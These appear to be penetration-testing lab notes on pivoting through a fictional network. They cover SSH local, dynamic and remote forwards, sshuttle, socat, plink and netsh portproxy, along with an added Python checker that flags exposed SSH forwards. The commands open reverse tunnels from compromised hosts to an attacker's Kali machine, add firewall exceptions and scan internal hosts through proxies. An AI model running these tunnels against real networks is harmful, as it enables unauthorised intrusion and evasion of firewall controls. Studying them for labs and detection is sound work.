SSH Tunneling

Local Port Forwarding

WEB machine

From the WEB machine, we set up the port forward over SSH.

ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <user>@10.10.100.20

In this case, the port we want to forward is 445 on the Windows SHARES machine.

Dynamic Port Forwarding

WEB machine

ssh -N -D 0.0.0.0:9999 <user>@10.10.100.20

Kali

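We add the proxy connection to the proxychains4.conf file (Kali); on Parrot the file is proxychains.conf. The SOCKS listener runs on the WEB machine, so the entry points at its address, and smbclient connects to the real SMB port through the proxy.

vim /etc/proxychains4.conf
socks5 192.168.100.10 9999
proxychains smbclient //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>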

Remote Port Forwarding

KALI <-> FIREWALL <-> WEB > DATABASE > SHARES

Kali

sudo systemctl start ssh
sudo ss -tulpn

WEB machine

ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 kali@192.168.50.10

Kali

psql -h 127.0.0.1 -p 2345 -U postgres

Remote Dynamic Port Forwarding

KALI <- FIREWALL <- WEB -> INTERNAL NETWORK

WEB machine

ssh -N -R 9998 kali@192.168.50.10

Kali

sudo ss -tulpn
vim /etc/proxychains4.conf
socks5 127.0.0.1 9998 # add this line

# Run scans through proxychains
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20
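
Added example (not part of the original notes): a defender-side check that classifies the -L, -R and -D forwards shown above from process command lines, such as those recorded by auditd or Sysmon, and flags listeners requested on non-loopback addresses like the 0.0.0.0 binds used here. Function names and sample lines are constructed for illustration; only IPv4 and hostname specs are handled.

```python
# Added example: classify SSH port forwards seen in process command lines.
import ntpath

LOOPBACK = {"127.0.0.1", "localhost"}
KINDS = {"-L": "local", "-R": "remote", "-D": "dynamic"}

def parse_forward(flag, spec):
    """Parse [bind:]port[:host:hostport]; IPv4/hostnames only (assumption)."""
    parts = spec.split(":")
    kind = KINDS[flag]
    if flag == "-D" or (flag == "-R" and len(parts) <= 2):
        listen, target = parts, None        # SOCKS listener, no fixed target
        if flag == "-R":
            kind = "remote-dynamic"
    else:
        listen, target = parts[:-2], ":".join(parts[-2:])
    bind = listen[0] if len(listen) == 2 else None  # None: default (loopback)
    # For -R the bind is only a request; the server's GatewayPorts decides.
    return {"kind": kind, "bind": bind, "port": int(listen[-1]),
            "target": target,
            "exposed": bind is not None and bind not in LOOPBACK}

def find_forwards(cmdline):
    """Return one finding per -L/-R/-D option of an ssh/ssh.exe command."""
    tokens = cmdline.split()
    if not tokens or ntpath.basename(tokens[0]).lower() not in {"ssh", "ssh.exe"}:
        return []
    findings = []
    for i, tok in enumerate(tokens):
        if tok[:2] not in KINDS:
            continue
        # The spec may be attached (-L4455:...) or the next token (-L 4455:...)
        spec = tok[2:] or (tokens[i + 1] if i + 1 < len(tokens) else "")
        try:
            findings.append(parse_forward(tok[:2], spec))
        except (ValueError, IndexError):
            pass    # not a [bind:]port spec (e.g. Unix-socket forward)
    return findings

SAMPLES = [  # constructed, modelled on the commands in these notes
    "ssh -N -L 0.0.0.0:4455:172.16.50.10:445 user@10.10.100.20",
    "ssh -N -D 0.0.0.0:9999 user@10.10.100.20",
    "ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 kali@192.168.50.10",
    r"C:\Windows\System32\OpenSSH\ssh.exe -N -R 9998 user@192.168.50.10",
]

if __name__ == "__main__":
    for line in SAMPLES:
        for f in find_forwards(line):
            print("EXPOSED" if f["exposed"] else "loopback", f)
```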

sshuttle

System               IP
KALI                 192.168.50.10
WEB                  192.168.100.10
WINDOWS JUMP SERVER  192.168.100.20
DATABASE             10.10.100.20
WINDOWS - SHARES     172.16.50.10

KALI -> WEB -> INTERNAL NETWORK

WEB machine

socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22

Kali

sshuttle -r <user>@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24
smbclient -L //172.16.50.10/ -U <user> --password=<password>

ssh.exe

System               IP
KALI                 192.168.50.10
WEB                  192.168.100.10
WINDOWS JUMP SERVER  192.168.100.20
DATABASE             10.10.100.20
WINDOWS - SHARES     172.16.50.10

KALI <- FIREWALL <- WINDOWS JUMP SERVER -> INTERNAL NETWORK

Kali

sudo systemctl start ssh
xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:192.168.100.20

Windows Jump Server

where ssh
C:\Windows\System32\OpenSSH\ssh.exe
C:\Windows\System32\OpenSSH> ssh -N -R 9998 <USERNAME>@192.168.50.10

Kali

ss -tulpn
vim /etc/proxychains4.conf
socks5 127.0.0.1 9998  # add this line

proxychains psql -h 10.10.100.20 -U postgres

Plink

System               IP
KALI                 192.168.50.10
WEB                  192.168.100.10
WINDOWS JUMP SERVER  192.168.100.20
DATABASE             10.10.100.20
WINDOWS - SHARES     172.16.50.10

KALI <- FIREWALL <- WINDOWS JUMP SERVER

Kali

find / -name plink.exe 2>/dev/null
/usr/share/windows-resources/binaries/plink.exe

Windows Jump Server

plink.exe -ssh -l <USERNAME> -pw <PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10

Kali

ss -tulpn
xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:127.0.0.1:9833

Netsh

System               IP
KALI                 192.168.50.10
WEB                  192.168.100.10
WINDOWS JUMP SERVER  192.168.100.20
DATABASE             10.10.100.20
WINDOWS - SHARES     172.16.50.10

KALI <- FIREWALL <- WINDOWS JUMP SERVER -> DATABASE

Kali

xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:192.168.100.20

Windows Jump Server

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.100.20 connectport=22 connectaddress=10.10.100.20
netstat -anp TCP | findstr "2222"
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.100.20 localport=2222 action=allow

Kali

sudo nmap -sS 192.168.100.20 -Pn -n -p2222
ssh database_admin@192.168.100.20 -p2222

Windows Jump Server

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.100.20